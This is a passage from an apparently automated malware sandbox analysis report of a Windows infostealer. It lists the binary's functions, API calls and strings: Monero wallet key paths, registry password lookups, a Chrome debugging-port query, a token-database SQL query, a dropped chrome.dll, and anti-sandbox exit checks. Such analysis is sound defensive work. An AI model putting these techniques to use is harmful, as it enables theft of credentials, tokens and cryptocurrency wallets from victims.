Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA

DeleteFileA.KERNEL32(00000000), ref: 004014EF
memset.MSVCRT ref: 00401516

Strings

\Monero\wallet.keys, xrefs: 0040138D
.keys, xrefs: 0040136B
SOFTWARE\monero-project\monero-core, xrefs: 00401335
wallet_path, xrefs: 00401330

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 1930502592-218353709
Opcode ID: e3d5bec035dc6fd6cfba6465e8e87e0563bd79b24a71acc82a2be867d31e93ce
Instruction ID: 91d196edc73d7b6f8c296897208d277d59dfaaed670e0723808fef4753f6ecf5
Opcode Fuzzy Hash: e3d5bec035dc6fd6cfba6465e8e87e0563bd79b24a71acc82a2be867d31e93ce
Instruction Fuzzy Hash: 5C5153B1E4011857CB14EB60DD96BED733D9F50304F4045EEB20A62091EF346BD8CA6D

Function 00409A50 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 107networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(00420AF6,00000001,00000000,00000000,00000000), ref: 00409A6A
InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00409AAB
InternetCloseHandle.WININET(00000000), ref: 00409AC7

Strings

"webSocketDebuggerUrl":, xrefs: 00409B4B
"ws://, xrefs: 00409B84
http://localhost:9229/json, xrefs: 00409A9F

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: Internet$Open$CloseHandle
String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
API String ID: 3289985339-2144369209
Opcode ID: df42730a7df05cb3dffdd8d9d42034123d9ff52f0b74835bd1f4bccf8b42b15b
Instruction ID: 0f1aeaff872d7c49557bad201f7799beed6e37fae62d2ecc5a0974bcd0f07f8e
Opcode Fuzzy Hash: df42730a7df05cb3dffdd8d9d42034123d9ff52f0b74835bd1f4bccf8b42b15b
Instruction Fuzzy Hash: 16414B35A10258EBCB14EB90DC85FDD7774BB48340F1041AAF505BA191DBB8AEC0CF68

Function 00407630 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00407330: memset.MSVCRT ref: 00407374
Part of subcall function 00407330: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,00407CF0), ref: 0040739A
Part of subcall function 00407330: RegEnumValueA.ADVAPI32(00407CF0,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00407411
Part of subcall function 00407330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040746D
Part of subcall function 00407330: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B2
Part of subcall function 00407330: HeapFree.KERNEL32(00000000,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B9

lstrcatA.KERNEL32(29A26020,0042192C,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?,?,00416414), ref: 00407666
lstrcatA.KERNEL32(29A26020,00000000,00000000), ref: 004076A8
lstrcatA.KERNEL32(29A26020, : ), ref: 004076BA
lstrcatA.KERNEL32(29A26020,00000000,00000000,00000000), ref: 004076EF
lstrcatA.KERNEL32(29A26020,00421934), ref: 00407700
lstrcatA.KERNEL32(29A26020,00000000,00000000,00000000), ref: 00407733
lstrcatA.KERNEL32(29A26020,00421938), ref: 0040774D
task.LIBCPMTD ref: 0040775B

Strings

: , xrefs: 004076AE

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
String ID: :
API String ID: 3191641157-3653984579
Opcode ID: 86722b1cec0ced89aae4bb8c58d418a67cc7668df74116a1a29cde1edbbe946f
Instruction ID: 7dd5c8f6c25e89eb5421da9b581f9cff4d94f04832d352fdfe902425259828cd
Opcode Fuzzy Hash: 86722b1cec0ced89aae4bb8c58d418a67cc7668df74116a1a29cde1edbbe946f
Instruction Fuzzy Hash: B73164B1E05114DBDB04EBA0DD55DFE737AAF48305B50411EF102772E0DA38AA85CB96

Function 00407330 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00407374
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,00407CF0), ref: 0040739A
RegEnumValueA.ADVAPI32(00407CF0,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00407411
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040746D
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B2
HeapFree.KERNEL32(00000000,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B9

Part of subcall function 00409290: vsprintf_s.MSVCRT ref: 004092AB

task.LIBCPMTD ref: 004075B5

Strings

Password, xrefs: 00407461

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
String ID: Password
API String ID: 2698061284-3434357891
Opcode ID: 3a3dd591c7cbb0d90e152054b3ac75d8c6492caf44e892e450b93b3cf6805213
Instruction ID: 394e2b55a83f95d9b644045a39dee7934e13af239b1baa97d0343fed5997f3db
Opcode Fuzzy Hash: 3a3dd591c7cbb0d90e152054b3ac75d8c6492caf44e892e450b93b3cf6805213
Instruction Fuzzy Hash: 43611EB5D041689BDB24DB50CC41BDAB7B8BF54304F0081EAE649A6181EF746FC9CF95

Function 00417690 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004176D2
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041770F
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417793
HeapAlloc.KERNEL32(00000000), ref: 0041779A
wsprintfA.USER32 ref: 004177D0

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Strings

:, xrefs: 004176EC
C, xrefs: 004176DC
\, xrefs: 004176F0

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\
API String ID: 3790021787-3809124531
Opcode ID: 39db56893d369c74f5f4f3db1860a6a0fb8aa9103e681a18a70390936e9ddc23
Instruction ID: 56630df3f9a1121e358c86d43682af9e85f8bbcd47ea8763ba8f74f533c9f43c
Opcode Fuzzy Hash: 39db56893d369c74f5f4f3db1860a6a0fb8aa9103e681a18a70390936e9ddc23
Instruction Fuzzy Hash: 8541B6B1D05358DBDB10DF94CC45BDEBBB8AF48704F10009AF509A7280D7786B84CBA9

Function 00418290 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,02D25700,00000000,?,00420E14,00000000,?,00000000), ref: 004182C0
HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,02D25700,00000000,?,00420E14,00000000,?,00000000,00000000), ref: 004182C7
GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 004182E8
__aulldiv.LIBCMT ref: 00418302
__aulldiv.LIBCMT ref: 00418310
wsprintfA.USER32 ref: 0041833C

Strings

@, xrefs: 004182DD
%d MB, xrefs: 00418333

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2886426298-3474575989
Opcode ID: d0391a1658ec30498705cc8c9cee2c4097af9c2ce960180bd43284ebda5957a4
Instruction ID: 389ef6515a1f2427be64b00d9458de7be2b91b0079cd17c5d853587b1d371e56
Opcode Fuzzy Hash: d0391a1658ec30498705cc8c9cee2c4097af9c2ce960180bd43284ebda5957a4
Instruction Fuzzy Hash: 8B214AF1E44218ABDB00DFD5DD49FAEBBB9FB44B04F10450AF615BB280D77969008BA9

Function 004060F0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899

InternetOpenA.WININET(00420DFB,00000001,00000000,00000000,00000000), ref: 0040615F
StrCmpCA.SHLWAPI(?,02D27178), ref: 00406197
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 004061DF
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406203
InternetReadFile.WININET(00412DB1,?,00000400,?), ref: 0040622C
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040625A
CloseHandle.KERNEL32(?,?,00000400), ref: 00406299
InternetCloseHandle.WININET(00412DB1), ref: 004062A3
InternetCloseHandle.WININET(00000000), ref: 004062B0

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 4287319946-0
Opcode ID: 1c45575967e245208d1b66e74f57e8ef9ea71a23c73f0dc5bceaa006f786f8ee
Instruction ID: 62bae03b9e4771e022f65dfe0b744ca25a6527e7e90d195df508867c32b8ef77
Opcode Fuzzy Hash: 1c45575967e245208d1b66e74f57e8ef9ea71a23c73f0dc5bceaa006f786f8ee
Instruction Fuzzy Hash: CD5184B1A01218ABDB20EF90DC45FEE7779AB44305F0041AEF605B71C0DB786A95CF59

Function 0040BA50 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 0040A560: memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D

lstrlenA.KERNEL32(00000000), ref: 0040BC6F

Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2

StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BC9D
lstrlenA.KERNEL32(00000000), ref: 0040BD75
lstrlenA.KERNEL32(00000000), ref: 0040BD89

Strings

SELECT service, encrypted_token FROM token_service, xrefs: 0040BBBB
AccountTokens, xrefs: 0040BA8A
AccountId, xrefs: 0040BC94
AccountTokens, xrefs: 0040BB19

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 1440504306-1079375795
Opcode ID: 5d8fd7150bbab32aa10d6a6ddcf22ca8922fb795de8831e4a5fc5189924e9d1b
Instruction ID: 6476b4a2e47316619015001d7be3bff7ad81932ea7eb7605c7a9cb508b765a87
Opcode Fuzzy Hash: 5d8fd7150bbab32aa10d6a6ddcf22ca8922fb795de8831e4a5fc5189924e9d1b
Instruction Fuzzy Hash: E9B17371A111089BCB04FBA1DCA6EEE7339AF14314F40456FF50673195EF386A98CB6A

Function 004108A0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 00419850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,004108DC,C:\ProgramData\chrome.dll), ref: 00419871

Part of subcall function 0040A090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll,?,004108E4), ref: 0040A098

StrCmpCA.SHLWAPI(00000000,02D1E258), ref: 00410922
StrCmpCA.SHLWAPI(00000000,02D1E1B8), ref: 00410B79
StrCmpCA.SHLWAPI(00000000,02D1E118), ref: 00410A0C

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00410C35

Strings

C:\ProgramData\chrome.dll, xrefs: 00410C30
C:\ProgramData\chrome.dll, xrefs: 004108CD

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$CreateDeleteLibraryLoad
String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
API String ID: 585553867-663540502
Opcode ID: 07fc8bcfbd882e64d2e88910101548a862921025afaaefe641f2ea6f694a2c3f
Instruction ID: 798b8003b846a09b6b7b20e33334a9dbf0f3b1503011c00658a7b4d9c0c3a9bc
Opcode Fuzzy Hash: 07fc8bcfbd882e64d2e88910101548a862921025afaaefe641f2ea6f694a2c3f
Instruction Fuzzy Hash: DCA176717001089FCB18EF65D996FED7776AF94304F10812EE40A5F391EB349A49CB9A

Function 00416C90 Relevance: 10.6, APIs: 7, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00419BB0: GetProcAddress.KERNEL32(77190000,02CA1298), ref: 00419BF1
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(77190000,02CA11F0), ref: 00419C0A
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(77190000,02CA12B0), ref: 00419C22
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(77190000,02CA1370), ref: 00419C3A
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(77190000,02CA1358), ref: 00419C53
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(77190000,02D1DF28), ref: 00419C6B
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(77190000,02D1B230), ref: 00419C83
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(77190000,02D1B0F0), ref: 00419C9C
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(77190000,02CA13B8), ref: 00419CB4
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(77190000,02CA1388), ref: 00419CCC
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(77190000,02CA13A0), ref: 00419CE5
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(77190000,02CA13D0), ref: 00419CFD
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(77190000,02D1B070), ref: 00419D15
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(77190000,02CA13E8), ref: 00419D2E

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211

Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416CB7,00420AF3), ref: 0040116A
Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E

Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416CBC), ref: 0040112B
Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00416CBC), ref: 00401132
Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143

Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294

Part of subcall function 00416A10: GetUserDefaultLangID.KERNEL32(?,?,00416CC6,00420AF3), ref: 00416A14

GetUserDefaultLCID.KERNEL32 ref: 00416CC6

Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6

Part of subcall function 004179E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417A10
